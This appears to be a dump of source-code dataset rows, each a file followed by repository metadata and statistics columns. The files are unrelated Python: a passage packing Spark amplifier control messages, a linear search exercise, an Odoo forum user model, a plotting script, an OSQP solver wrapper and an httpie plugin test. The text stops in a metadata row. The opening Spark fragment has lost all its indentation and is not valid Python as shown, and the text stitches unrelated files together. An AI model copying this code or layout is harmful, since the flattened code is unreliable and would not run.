format_byte |= (1 << (pos-1))
for i in range (0, len(msg)):
tmp_data += bytes([msg[i]])
pos += 1
block_pos += 1
if pos == 8:
snd_data += bytes([format_byte])
snd_data += tmp_data
format_byte = 0
pos = 1
block_pos += 1
tmp_data = b''
if (block_pos == max_size - 1) and multi_chunk:
end_chunk ()
this_chunk += 1
size = len(snd_data)
end_msg = snd_data[0:6] + bytes([size]) + snd_data[7:]
final_data.append(end_msg)
pack_header(this_cmd, this_sub_cmd, True)
def end_pack():
global snd_data, tmp_data, pos, format_byte, final_data, multi_chunk
end_chunk()
# update the block size field
block_size = len(snd_data)
end_msg = snd_data[0:6] + bytes([block_size]) + snd_data[7:]
final_data.append(end_msg)
# update chunk size and counts for all chunks
if multi_chunk:
num_chunks = len (final_data)
for m in range(0, num_chunks):
tmp_msg = final_data[m]
format1 = tmp_msg[22]
if m == num_chunks - 1: # last chunk
s1 = block_size - 16 - 6 - 4 - 1
chunk_size = s1 - int ((s1+2) / 8)
format1 = format1 & 0xfb # very odd it sometimes doesn't like a 4 in the first format for the final chunk
else:
chunk_size = 0
end_msg = tmp_msg[0:22] + bytes([format1]) + bytes ([num_chunks]) + bytes ([m]) + bytes([chunk_size]) + tmp_msg[26:]
final_data[m] = end_msg
return final_data
######## Helper functions for packing data types
def add_prefixed_string(pack_str):
add_pack ([len(pack_str)], False)
add_pack (bytes([len(pack_str)+0x20]) + bytes(pack_str, 'utf-8'))
def add_string(pack_str):
add_pack (bytes([len(pack_str)+0x20]) + bytes(pack_str, 'utf-8'))
def add_long_string(pack_str):
add_pack (b'\x59')
add_pack (bytes([len(pack_str)]) + bytes(pack_str, 'utf-8'), False)
def add_float(flt):
bytes_val = struct.pack(">f", flt)
add_pack (b'\x4a' + bytes_val)
def add_onoff (onoff):
if onoff == "On":
b = b'\x43'
else:
b = b'\x42'
add_pack(b)
######## Functions to package a command for the Spark
def pack_parameter_change (pedal, param, val):
cmd = 0x01
sub_cmd = 0x04
start_packing (cmd, sub_cmd)
add_prefixed_string (pedal)
add_pack ([param])
add_float(val)
return end_pack ()
def pack_pedal_change (pedal1, pedal2):
cmd = 0x01
sub_cmd = 0x06
start_packing (cmd, sub_cmd)
add_prefixed_string (pedal1)
add_prefixed_string (pedal2)
return end_pack ()
def pack_hardware_preset_change (preset_num): # preset_num is 0 to 3
cmd = 0x01
sub_cmd = 0x38
start_packing (cmd, sub_cmd)
add_pack ([0], False)
add_pack ([preset_num], False) ##### CHANGED
return end_pack ()
def pack_turn_pedal_onoff (pedal, onoff):
cmd = 0x01
sub_cmd = 0x15
start_packing (cmd, sub_cmd)
add_prefixed_string (pedal)
add_onoff (onoff)
return end_pack ()
def pack_preset (preset):
global this_chunk, tmp_data, snd_data
cmd = 0x01
sub_cmd = 0x01
this_chunk = 0
start_packing (cmd, sub_cmd, True)
add_pack (b'\x00\x7f', False)
add_long_string (preset["UUID"])
add_string (preset["Name"])
add_string (preset["Version"])
descr = preset["Description"]
if len (descr) > 31:
add_long_string (descr)
else:
add_string (descr)
add_string (preset["Icon"])
add_float (preset["BPM"])
add_pack (bytes([0x10 + 7])) # always 7 pedals
for i in range (0, 7):
add_string (preset["Pedals"][i]["Name"])
add_onoff (preset["Pedals"][i]["OnOff"])
num_p = len(preset["Pedals"][i]["Parameters"])
add_pack (bytes([num_p + 0x10]))
for p in range (0, num_p):
add_pack (bytes([p]), False)
add_pack (b'\x11')
add_float (preset["Pedals"][i]["Parameters"][p])
add_pack (bytes([preset["End Filler"]]))
return end_pack ()
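# Illustrative usage (the transport object is hypothetical, not part of this
# file): each returned element is one ready-to-send chunk of at most 0xad bytes.
#   for block in pack_turn_pedal_onoff("bias.reverb", "On"):
#       connection.write(block)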
| 27.540084 | 129 | 0.581431 | 931 | 6,527 | 3.828142 | 0.18797 | 0.037318 | 0.022727 | 0.031425 | 0.329125 | 0.259259 | 0.224747 | 0.207912 | 0.150393 | 0.121773 | 0 | 0.03979 | 0.299219 | 6,527 | 236 | 130 | 27.65678 | 0.739397 | 0.140034 | 0 | 0.294872 | 0 | 0 | 0.041682 | 0.010826 | 0 | 0 | 0.012992 | 0 | 0 | 1 | 0.096154 | false | 0 | 0.00641 | 0 | 0.141026 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
651b4cd98598dd151533e039b51ab26fcfefc930 | 961 | py | Python | Data Structures and Algorithms/Searching Algorithms/Linear Search Algorithms/LinearSearchUserInput.py | akkik04/Python-DataStructures-and-Algorithms | 8db63173218e5a9205dbb325935c71fec93b695c | [
"MIT"
] | 1 | 2022-01-22T18:19:07.000Z | 2022-01-22T18:19:07.000Z | Data Structures and Algorithms/Searching Algorithms/Linear Search Algorithms/LinearSearchUserInput.py | akkik04/Python-DataStructures-and-Algorithms | 8db63173218e5a9205dbb325935c71fec93b695c | [
"MIT"
] | null | null | null | Data Structures and Algorithms/Searching Algorithms/Linear Search Algorithms/LinearSearchUserInput.py | akkik04/Python-DataStructures-and-Algorithms | 8db63173218e5a9205dbb325935c71fec93b695c | [
"MIT"
] | null | null | null | # AKSHITH K
# LINEAR SEARCH IMPLEMENTED IN PYTHON WITH USER INPUT.
# creating a function to search for the desired element in the array.
def linear_search(arr, desired_element):
# creating a for-loop to iterate for the elements in the array.
for i in range(len(arr)):
# creating a nested if-statement to check if the element is found at an index in the array.
if arr[i] == desired_element:
# returning the value of the index if desired element is present at it.
return 'The element is present at index ' + str(i)
# returning 'None' if the element is not found in the array.
return None
# receiving input for the array and desired element.
arr = list(map(int, input().rstrip().split()))
desired_element = int(input())
# code to print the final output, which indicates if the element is found at an index.
result = linear_search(arr, desired_element)
print(result)
| 36.961538 | 100 | 0.681582 | 147 | 961 | 4.414966 | 0.401361 | 0.151002 | 0.061633 | 0.064715 | 0.175655 | 0.086287 | 0.086287 | 0.086287 | 0 | 0 | 0 | 0 | 0.24974 | 961 | 25 | 101 | 38.44 | 0.900139 | 0.57128 | 0 | 0 | 0 | 0 | 0.084881 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0 | 0 | 0.333333 | 0.111111 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
651be986c89ec9c593d35b577a7a61664b061692 | 5,198 | py | Python | web/addons/website_forum/models/res_users.py | diogocs1/comps | 63df07f6cf21c41e4527c06e2d0499f23f4322e7 | [
"Apache-2.0"
] | 1 | 2019-12-29T11:53:56.000Z | 2019-12-29T11:53:56.000Z | odoo/addons/website_forum/models/res_users.py | tuanquanghpvn/odoo8-tutorial | 52d25f1ca5f233c431cb9d3b24b79c3b4fb5127e | [
"MIT"
] | null | null | null | odoo/addons/website_forum/models/res_users.py | tuanquanghpvn/odoo8-tutorial | 52d25f1ca5f233c431cb9d3b24b79c3b4fb5127e | [
"MIT"
] | 3 | 2020-10-08T14:42:10.000Z | 2022-01-28T14:12:29.000Z | # -*- coding: utf-8 -*-
from datetime import datetime
from urllib import urlencode
import hashlib
from openerp import SUPERUSER_ID
from openerp.osv import osv, fields
class Users(osv.Model):
_inherit = 'res.users'
def __init__(self, pool, cr):
init_res = super(Users, self).__init__(pool, cr)
self.SELF_WRITEABLE_FIELDS = list(
set(
self.SELF_WRITEABLE_FIELDS +
['country_id', 'city', 'website', 'website_description', 'website_published']))
return init_res
def _get_user_badge_level(self, cr, uid, ids, name, args, context=None):
"""Return total badge per level of users"""
result = dict.fromkeys(ids, False)
badge_user_obj = self.pool['gamification.badge.user']
for id in ids:
result[id] = {
'gold_badge': badge_user_obj.search(cr, uid, [('badge_id.level', '=', 'gold'), ('user_id', '=', id)], context=context, count=True),
'silver_badge': badge_user_obj.search(cr, uid, [('badge_id.level', '=', 'silver'), ('user_id', '=', id)], context=context, count=True),
'bronze_badge': badge_user_obj.search(cr, uid, [('badge_id.level', '=', 'bronze'), ('user_id', '=', id)], context=context, count=True),
}
return result
_columns = {
'create_date': fields.datetime('Create Date', select=True, readonly=True),
'karma': fields.integer('Karma'),
'badge_ids': fields.one2many('gamification.badge.user', 'user_id', 'Badges'),
'gold_badge': fields.function(_get_user_badge_level, string="Number of gold badges", type='integer', multi='badge_level'),
'silver_badge': fields.function(_get_user_badge_level, string="Number of silver badges", type='integer', multi='badge_level'),
'bronze_badge': fields.function(_get_user_badge_level, string="Number of bronze badges", type='integer', multi='badge_level'),
}
_defaults = {
'karma': 0,
}
def _generate_forum_token(self, cr, uid, user_id, email):
"""Return a token for email validation. This token is valid for the day
and is a hash based on a (secret) uuid generated by the forum module,
the user_id, the email and currently the day (to be updated if necessary). """
forum_uuid = self.pool.get('ir.config_parameter').get_param(cr, SUPERUSER_ID, 'website_forum.uuid')
return hashlib.sha256('%s-%s-%s-%s' % (
datetime.now().replace(hour=0, minute=0, second=0, microsecond=0),
forum_uuid,
user_id,
email)).hexdigest()
def send_forum_validation_email(self, cr, uid, user_id, forum_id=None, context=None):
user = self.pool['res.users'].browse(cr, uid, user_id, context=context)
token = self._generate_forum_token(cr, uid, user_id, user.email)
activation_template_id = self.pool['ir.model.data'].xmlid_to_res_id(cr, uid, 'website_forum.validation_email')
if activation_template_id:
params = {
'token': token,
'id': user_id,
'email': user.email}
if forum_id:
params['forum_id'] = forum_id
base_url = self.pool['ir.config_parameter'].get_param(cr, uid, 'web.base.url')
token_url = base_url + '/forum/validate_email?%s' % urlencode(params)
tpl_ctx = dict(context, token_url=token_url)
self.pool['email.template'].send_mail(cr, SUPERUSER_ID, activation_template_id, user_id, force_send=True, context=tpl_ctx)
return True
def process_forum_validation_token(self, cr, uid, token, user_id, email, forum_id=None, context=None):
validation_token = self.pool['res.users']._generate_forum_token(cr, uid, user_id, email)
user = self.pool['res.users'].browse(cr, SUPERUSER_ID, user_id, context=context)
if token == validation_token and user.karma == 0:
karma = 3
if not forum_id:
forum_ids = self.pool['forum.forum'].search(cr, uid, [], limit=1, context=context)
if forum_ids:
forum_id = forum_ids[0]
if forum_id:
forum = self.pool['forum.forum'].browse(cr, uid, forum_id, context=context)
# karma gained: karma to ask a question and have 2 downvotes
karma = forum.karma_ask + (-2 * forum.karma_gen_question_downvote)
return user.write({'karma': karma})
return False
def add_karma(self, cr, uid, ids, karma, context=None):
for user in self.browse(cr, uid, ids, context=context):
self.write(cr, uid, [user.id], {'karma': user.karma + karma}, context=context)
return True
def get_serialised_gamification_summary(self, cr, uid, excluded_categories=None, context=None):
if isinstance(excluded_categories, list):
if 'forum' not in excluded_categories:
excluded_categories.append('forum')
else:
excluded_categories = ['forum']
return super(Users, self).get_serialised_gamification_summary(cr, uid, excluded_categories=excluded_categories, context=context)
| 49.980769 | 151 | 0.630242 | 671 | 5,198 | 4.655738 | 0.228018 | 0.03041 | 0.017286 | 0.021127 | 0.227593 | 0.200704 | 0.152689 | 0.086428 | 0.086428 | 0.086428 | 0 | 0.004053 | 0.240477 | 5,198 | 103 | 152 | 50.466019 | 0.787234 | 0.064255 | 0 | 0.048193 | 0 | 0 | 0.144541 | 0.020678 | 0 | 0 | 0 | 0 | 0 | 1 | 0.084337 | false | 0 | 0.060241 | 0 | 0.289157 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
651ee3b9a5875777f0b64fee44f532e1d5e39624 | 2,183 | py | Python | fig_02_example_fit.py | terhardt/DO-progression | 7ac2cdd5fb5ea48a66edb4fffd44285d607b1027 | [
"MIT"
] | null | null | null | fig_02_example_fit.py | terhardt/DO-progression | 7ac2cdd5fb5ea48a66edb4fffd44285d607b1027 | [
"MIT"
] | null | null | null | fig_02_example_fit.py | terhardt/DO-progression | 7ac2cdd5fb5ea48a66edb4fffd44285d607b1027 | [
"MIT"
] | null | null | null | import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
import joblib as jl
from code.model import linear_ramp
from code.plotting import parcolors
from scipy.stats import gaussian_kde
def calc_med_iqr(y, q=[5, 95], axis=None):
qs = np.percentile(y, [q[0], 50, q[-1]], axis=axis)
yerr = np.diff(qs, axis=0)
y = qs[1]
return y, yerr
gi_table = pd.read_table('data/GIS_table.txt', comment='#')
par = 'Ca'
event = 'GI-8c'
ref_age = gi_table.loc[gi_table['Event'] == 'GI-8c', 'Age'].values
data_file = 'data/ramp_data/NGRIP_%s_%s.csv' % (event, par)
t, obs = pd.read_csv(data_file).values.T
t_plot = (ref_age - t) / 1000
traces = jl.load('ramp_fits/traces/NGRIP.gz')
traces = np.array(traces.sel(param=par, event=event))
ramps = np.array([linear_ramp(t, *p) for p in traces[:, :4]])
r_med, r_err = calc_med_iqr(ramps, axis=0)
fig, axes = plt.subplots(nrows=2, ncols=1, sharex=True, sharey=False,
gridspec_kw={'height_ratios': [2, 1]},
figsize=(3.5, 1.411 * 3.5))
fig.subplots_adjust(hspace=0.0)
axes[0].set_title('Onset of %s' % event)
axes[0].set_ylabel(r'$\ln(\mathrm{%s} \cdot \mathrm{ppb}^{-1})$' % par)
axes[1].set_xlabel('GICC05 Age (kyr before 1950)')
axes[1].set_ylabel('Marg. post. density\n(yr$^{-1}$)')
axes[0].plot(t_plot, obs, color=parcolors[par], lw=0.5)
axes[0].plot(t_plot, r_med, color='k')
axes[0].fill_between(t_plot, r_med - r_err[0], r_med + r_err[1],
alpha=.2, color='gray')
time_traces = (traces[:, 0],
traces[:, 0] + 0.5 * traces[:, 1],
traces[:, 0] + traces[:, 1])
amp_traces = (traces[:, 2],
traces[:, 2] + 0.5 * traces[:, 3],
traces[:, 2] + traces[:, 3])
for yt, tr in zip(amp_traces, time_traces):
kde = gaussian_kde(tr)
tr_med = np.median(tr)
l, = axes[1].plot(t_plot, kde(t), lw=1.0, color='k')
tmed, terr = calc_med_iqr(tr)
ymed, yerr = calc_med_iqr(yt)
for l, ax in zip(('a', 'b'), axes):
ax.text(0.01, 0.95, '(%s)' % l, ha='left', va='top', transform=ax.transAxes,
weight='bold', fontsize=7)
fig.savefig('figures/fig_02_example_fit.pdf')
| 30.746479 | 80 | 0.608337 | 377 | 2,183 | 3.37931 | 0.405836 | 0.019623 | 0.031397 | 0.018838 | 0.021978 | 0 | 0 | 0 | 0 | 0 | 0 | 0.043925 | 0.196977 | 2,183 | 70 | 81 | 31.185714 | 0.682829 | 0 | 0 | 0 | 0 | 0 | 0.125057 | 0.038937 | 0 | 0 | 0 | 0 | 0 | 1 | 0.019608 | false | 0 | 0.137255 | 0 | 0.176471 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
651f9fa4eae9ba17bd463c8fe66527cd4ed9376e | 13,968 | py | Python | module/interface.py | BerkeleyAutomation/rlqp-python | 55f378e496979bd00e84cea4583ac37bfaa571a9 | [
"Apache-2.0"
] | 4 | 2021-07-23T15:50:44.000Z | 2022-03-16T13:10:52.000Z | module/interface.py | BerkeleyAutomation/rlqp-python | 55f378e496979bd00e84cea4583ac37bfaa571a9 | [
"Apache-2.0"
] | null | null | null | module/interface.py | BerkeleyAutomation/rlqp-python | 55f378e496979bd00e84cea4583ac37bfaa571a9 | [
"Apache-2.0"
] | 1 | 2021-08-03T01:52:04.000Z | 2021-08-03T01:52:04.000Z | """
Python interface module for OSQP solver v0.6.2.post0
"""
from __future__ import print_function
from builtins import object
import rlqp._osqp as _osqp # Internal low level module
import numpy as np
import scipy.sparse as spa
from warnings import warn
from platform import system
import rlqp.codegen as cg
import rlqp.utils as utils
import sys
import qdldl
class OSQP(object):
def __init__(self):
self._model = _osqp.OSQP()
def version(self):
return self._model.version()
def setup(self, P=None, q=None, A=None, l=None, u=None, **settings):
"""
Setup OSQP solver problem of the form
minimize 1/2 x' * P * x + q' * x
subject to l <= A * x <= u
solver settings can be specified as additional keyword arguments
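
        Example (a small illustrative QP; the data below is made up for this
        docstring, it is not part of the module):

            import numpy as np
            import scipy.sparse as spa

            prob = OSQP()
            P = spa.csc_matrix([[4.0, 1.0], [1.0, 2.0]])
            q = np.array([1.0, 1.0])
            A = spa.csc_matrix([[1.0, 1.0], [1.0, 0.0], [0.0, 1.0]])
            l = np.array([1.0, 0.0, 0.0])
            u = np.array([1.0, 0.7, 0.7])
            prob.setup(P=P, q=q, A=A, l=l, u=u, alpha=1.0)
            results = prob.solve()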
"""
# TODO(bart): this will be unnecessary when the derivative will be in C
self._derivative_cache = {'P': P, 'q': q, 'A': A, 'l': l, 'u': u}
unpacked_data, settings = utils.prepare_data(P, q, A, l, u, **settings)
self._model.setup(*unpacked_data, **settings)
def update(self, q=None, l=None, u=None,
Px=None, Px_idx=np.array([]), Ax=None, Ax_idx=np.array([])):
"""
Update OSQP problem arguments
"""
# get problem dimensions
(n, m) = self._model.dimensions()
# check consistency of the input arguments
if q is not None and len(q) != n:
raise ValueError("q must have length n")
if l is not None:
if not isinstance(l, np.ndarray):
raise TypeError("l must be numpy.ndarray, not %s" %
type(l).__name__)
elif len(l) != m:
raise ValueError("l must have length m")
# Convert values to -OSQP_INFTY
l = np.maximum(l, -_osqp.constant('OSQP_INFTY'))
if u is not None:
if not isinstance(u, np.ndarray):
raise TypeError("u must be numpy.ndarray, not %s" %
type(u).__name__)
elif len(u) != m:
raise ValueError("u must have length m")
# Convert values to OSQP_INFTY
u = np.minimum(u, _osqp.constant('OSQP_INFTY'))
if Ax is None:
if len(Ax_idx) > 0:
raise ValueError("Vector Ax has not been specified")
else:
if len(Ax_idx) > 0 and len(Ax) != len(Ax_idx):
raise ValueError("Ax and Ax_idx must have the same lengths")
if Px is None:
if len(Px_idx) > 0:
raise ValueError("Vector Px has not been specified")
else:
if len(Px_idx) > 0 and len(Px) != len(Px_idx):
raise ValueError("Px and Px_idx must have the same lengths")
if q is None and l is None and u is None and Px is None and Ax is None:
raise ValueError("No updatable data has been specified")
# update linear cost
if q is not None:
self._model.update_lin_cost(q)
# update lower bound
if l is not None and u is None:
self._model.update_lower_bound(l)
# update upper bound
if u is not None and l is None:
self._model.update_upper_bound(u)
# update bounds
if l is not None and u is not None:
self._model.update_bounds(l, u)
# update matrix P
if Px is not None and Ax is None:
self._model.update_P(Px, Px_idx, len(Px))
# update matrix A
if Ax is not None and Px is None:
self._model.update_A(Ax, Ax_idx, len(Ax))
# update matrices P and A
if Px is not None and Ax is not None:
self._model.update_P_A(Px, Px_idx, len(Px), Ax, Ax_idx, len(Ax))
# TODO(bart): this will be unnecessary when the derivative will be in C
# update problem data in self._derivative_cache
if q is not None:
self._derivative_cache["q"] = q
if l is not None:
self._derivative_cache["l"] = l
if u is not None:
self._derivative_cache["u"] = u
if Px is not None:
if Px_idx.size == 0:
self._derivative_cache["P"].data = Px
else:
self._derivative_cache["P"].data[Px_idx] = Px
if Ax is not None:
if Ax_idx.size == 0:
self._derivative_cache["A"].data = Ax
else:
self._derivative_cache["A"].data[Ax_idx] = Ax
# delete results from self._derivative_cache to prohibit
# taking the derivative of unsolved problems
if "results" in self._derivative_cache.keys():
del self._derivative_cache["results"]
def update_settings(self, **kwargs):
"""
Update OSQP solver settings
It is possible to change: 'max_iter', 'eps_abs', 'eps_rel',
'eps_prim_inf', 'eps_dual_inf', 'rho'
'alpha', 'delta', 'polish',
'polish_refine_iter',
'verbose', 'scaled_termination',
'check_termination', 'time_limit',
"""
# get arguments
max_iter = kwargs.pop('max_iter', None)
eps_abs = kwargs.pop('eps_abs', None)
eps_rel = kwargs.pop('eps_rel', None)
eps_prim_inf = kwargs.pop('eps_prim_inf', None)
eps_dual_inf = kwargs.pop('eps_dual_inf', None)
rho = kwargs.pop('rho', None)
alpha = kwargs.pop('alpha', None)
delta = kwargs.pop('delta', None)
polish = kwargs.pop('polish', None)
polish_refine_iter = kwargs.pop('polish_refine_iter', None)
verbose = kwargs.pop('verbose', None)
scaled_termination = kwargs.pop('scaled_termination', None)
check_termination = kwargs.pop('check_termination', None)
warm_start = kwargs.pop('warm_start', None)
time_limit = kwargs.pop('time_limit', None)
# update them
if max_iter is not None:
self._model.update_max_iter(max_iter)
if eps_abs is not None:
self._model.update_eps_abs(eps_abs)
if eps_rel is not None:
self._model.update_eps_rel(eps_rel)
if eps_prim_inf is not None:
self._model.update_eps_prim_inf(eps_prim_inf)
if eps_dual_inf is not None:
self._model.update_eps_dual_inf(eps_dual_inf)
if rho is not None:
self._model.update_rho(rho)
if alpha is not None:
self._model.update_alpha(alpha)
if delta is not None:
self._model.update_delta(delta)
if polish is not None:
self._model.update_polish(polish)
if polish_refine_iter is not None:
self._model.update_polish_refine_iter(polish_refine_iter)
if verbose is not None:
self._model.update_verbose(verbose)
if scaled_termination is not None:
self._model.update_scaled_termination(scaled_termination)
if check_termination is not None:
self._model.update_check_termination(check_termination)
if warm_start is not None:
self._model.update_warm_start(warm_start)
if time_limit is not None:
self._model.update_time_limit(time_limit)
        if max_iter is None and \
                eps_abs is None and \
                eps_rel is None and \
                eps_prim_inf is None and \
                eps_dual_inf is None and \
                rho is None and \
                alpha is None and \
                delta is None and \
                polish is None and \
                polish_refine_iter is None and \
                verbose is None and \
                scaled_termination is None and \
                check_termination is None and \
                warm_start is None and \
                time_limit is None:
            raise ValueError("No updatable settings have been specified!")
def solve(self):
"""
Solve QP Problem
"""
# Solve QP
results = self._model.solve()
# TODO(bart): this will be unnecessary when the derivative will be in C
self._derivative_cache['results'] = results
return results
def warm_start(self, x=None, y=None):
"""
Warm start primal or dual variables
"""
# get problem dimensions
(n, m) = self._model.dimensions()
if x is not None:
if len(x) != n:
raise ValueError("Wrong dimension for variable x")
if y is None:
self._model.warm_start_x(x)
if y is not None:
if len(y) != m:
raise ValueError("Wrong dimension for variable y")
if x is None:
self._model.warm_start_y(y)
if x is not None and y is not None:
self._model.warm_start(x, y)
if x is None and y is None:
raise ValueError("Unrecognized fields")
def codegen(self, folder, project_type='', parameters='vectors',
python_ext_name='emosqp', force_rewrite=False,
FLOAT=False, LONG=True):
"""
Generate embeddable C code for the problem
"""
# Check parameters arguments
if parameters == 'vectors':
embedded = 1
elif parameters == 'matrices':
embedded = 2
else:
raise ValueError("Unknown value of 'parameters' argument.")
# Set float and long flags
if FLOAT:
float_flag = 'ON'
else:
float_flag = 'OFF'
if LONG:
long_flag = 'ON'
else:
long_flag = 'OFF'
# Check project_type argument
expectedProject = ('', 'Makefile', 'MinGW Makefiles',
'Unix Makefiles', 'CodeBlocks', 'Xcode')
if project_type not in expectedProject:
raise ValueError("Unknown value of 'project_type' argument.")
if project_type == 'Makefile':
if system() == 'Windows':
project_type = 'MinGW Makefiles'
elif system() == 'Linux' or system() == 'Darwin':
project_type = 'Unix Makefiles'
# Convert workspace to Python
sys.stdout.write("Getting workspace from OSQP object... \t\t\t\t")
sys.stdout.flush()
work = self._model._get_workspace()
print("[done]")
# Generate code with codegen module
cg.codegen(work, folder, python_ext_name, project_type,
embedded, force_rewrite, float_flag, long_flag)
def derivative_iterative_refinement(self, rhs, max_iter=20, tol=1e-12):
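        """Solve M @ sol = rhs by iterative refinement, reusing the cached
        qdldl factorisation of the regularised KKT matrix to drive the
        residual below tol."""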
M = self._derivative_cache['M']
# Prefactor
solver = self._derivative_cache['solver']
sol = solver.solve(rhs)
for k in range(max_iter):
delta_sol = solver.solve(rhs - M @ sol)
sol = sol + delta_sol
if np.linalg.norm(M @ sol - rhs) < tol:
break
if k == max_iter - 1:
warn("max_iter iterative refinement reached.")
return sol
def adjoint_derivative(self, dx=None, dy_u=None, dy_l=None,
P_idx=None, A_idx=None, eps_iter_ref=1e-04):
"""
Compute adjoint derivative after solve.
"""
P, q = self._derivative_cache['P'], self._derivative_cache['q']
A = self._derivative_cache['A']
l, u = self._derivative_cache['l'], self._derivative_cache['u']
try:
results = self._derivative_cache['results']
except KeyError:
raise ValueError("Problem has not been solved. "
"You cannot take derivatives. "
"Please call the solve function.")
if results.info.status != "solved":
raise ValueError("Problem has not been solved to optimality. "
"You cannot take derivatives")
m, n = A.shape
x = results.x
y = results.y
y_u = np.maximum(y, 0)
y_l = -np.minimum(y, 0)
if A_idx is None:
A_idx = A.nonzero()
if P_idx is None:
P_idx = P.nonzero()
        if dx is None:
            dx = np.zeros(n)
        if dy_u is None:
            dy_u = np.zeros(m)
        if dy_l is None:
            dy_l = np.zeros(m)
# Make sure M matrix exists
if 'M' not in self._derivative_cache:
# Multiply second-third row by diag(y_u)^-1 and diag(y_l)^-1
# to make the matrix symmetric
inv_dia_y_u = spa.diags(np.reciprocal(y_u + 1e-20))
inv_dia_y_l = spa.diags(np.reciprocal(y_l + 1e-20))
M = spa.bmat([
[P, A.T, -A.T],
[A, spa.diags(A @ x - u) @ inv_dia_y_u, None],
[-A, None, spa.diags(l - A @ x) @ inv_dia_y_l]
], format='csc')
delta = spa.bmat([[eps_iter_ref * spa.eye(n), None],
[None, -eps_iter_ref * spa.eye(2 * m)]],
format='csc')
self._derivative_cache['M'] = M
self._derivative_cache['solver'] = qdldl.Solver(M + delta)
rhs = - np.concatenate([dx, dy_u, dy_l])
r_sol = self.derivative_iterative_refinement(rhs)
r_x, r_yu, r_yl = np.split(r_sol, [n, n+m])
# Extract derivatives for the constraints
rows, cols = A_idx
dA_vals = (y_u[rows] - y_l[rows]) * r_x[cols] + \
(r_yu[rows] - r_yl[rows]) * x[cols]
dA = spa.csc_matrix((dA_vals, (rows, cols)), shape=A.shape)
du = - r_yu
dl = r_yl
# Extract derivatives for the cost (P, q)
rows, cols = P_idx
dP_vals = .5 * (r_x[rows] * x[cols] + r_x[cols] * x[rows])
dP = spa.csc_matrix((dP_vals, P_idx), shape=P.shape)
dq = r_x
return (dP, dq, dA, dl, du)
| 33.985401 | 79 | 0.551976 | 1,853 | 13,968 | 3.975175 | 0.158122 | 0.024437 | 0.043986 | 0.038827 | 0.303421 | 0.222509 | 0.129378 | 0.067744 | 0.038148 | 0.027559 | 0 | 0.003863 | 0.351303 | 13,968 | 410 | 80 | 34.068293 | 0.809072 | 0.128794 | 0 | 0.056818 | 0 | 0 | 0.095242 | 0 | 0 | 0 | 0 | 0.007317 | 0 | 1 | 0.037879 | false | 0 | 0.041667 | 0.003788 | 0.098485 | 0.007576 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6522f4a37572ca36893a43e31c84c4371a93cb9a | 750 | py | Python | tests.py | httpie/httpie-snapdsocket | aa0d58beca2475b461ba9eac420fff5583e67bed | [
"BSD-3-Clause"
] | 2 | 2021-07-05T09:51:13.000Z | 2021-07-05T10:21:09.000Z | tests.py | httpie/httpie-snapdsocket | aa0d58beca2475b461ba9eac420fff5583e67bed | [
"BSD-3-Clause"
] | 1 | 2021-07-05T11:51:30.000Z | 2021-07-05T12:00:52.000Z | tests.py | httpie/httpie-snapdsocket | aa0d58beca2475b461ba9eac420fff5583e67bed | [
"BSD-3-Clause"
] | null | null | null | from unittest import TestCase
from httpie.client import build_requests_session
from httpie.plugins.registry import plugin_manager
from httpie_snapdsocket import SnapdSocketTransportPlugin
class TestSnapdSocketTransportPlugin(TestCase):
def test_simple(self):
# Package containing unicode characters
package = 'open-syobon-action'
plugin_manager.register(SnapdSocketTransportPlugin)
try:
session = build_requests_session(True)
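            # 'snapd:///...' URLs are routed over the snapd unix socket by the
            # transport plugin registered above.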
res = session.get('snapd:///v2/find?name=' + package).json()
self.assertTrue(isinstance(res, dict))
self.assertEqual(res['result'][0]['name'], package)
finally:
plugin_manager.unregister(SnapdSocketTransportPlugin)
| 34.090909 | 72 | 0.712 | 74 | 750 | 7.094595 | 0.621622 | 0.057143 | 0.07619 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00335 | 0.204 | 750 | 21 | 73 | 35.714286 | 0.876047 | 0.049333 | 0 | 0 | 0 | 0 | 0.070323 | 0.030942 | 0 | 0 | 0 | 0 | 0.133333 | 1 | 0.066667 | false | 0 | 0.266667 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
65233a043179900aaf998728bba519eeced66fa9 | 2,322 | py | Python | l5kit/l5kit/cle/scene_type_agg.py | cdicle-motional/l5kit | 4dc4ee5391479bb71f0b373f39c316f9eef5a961 | [
"Apache-2.0"
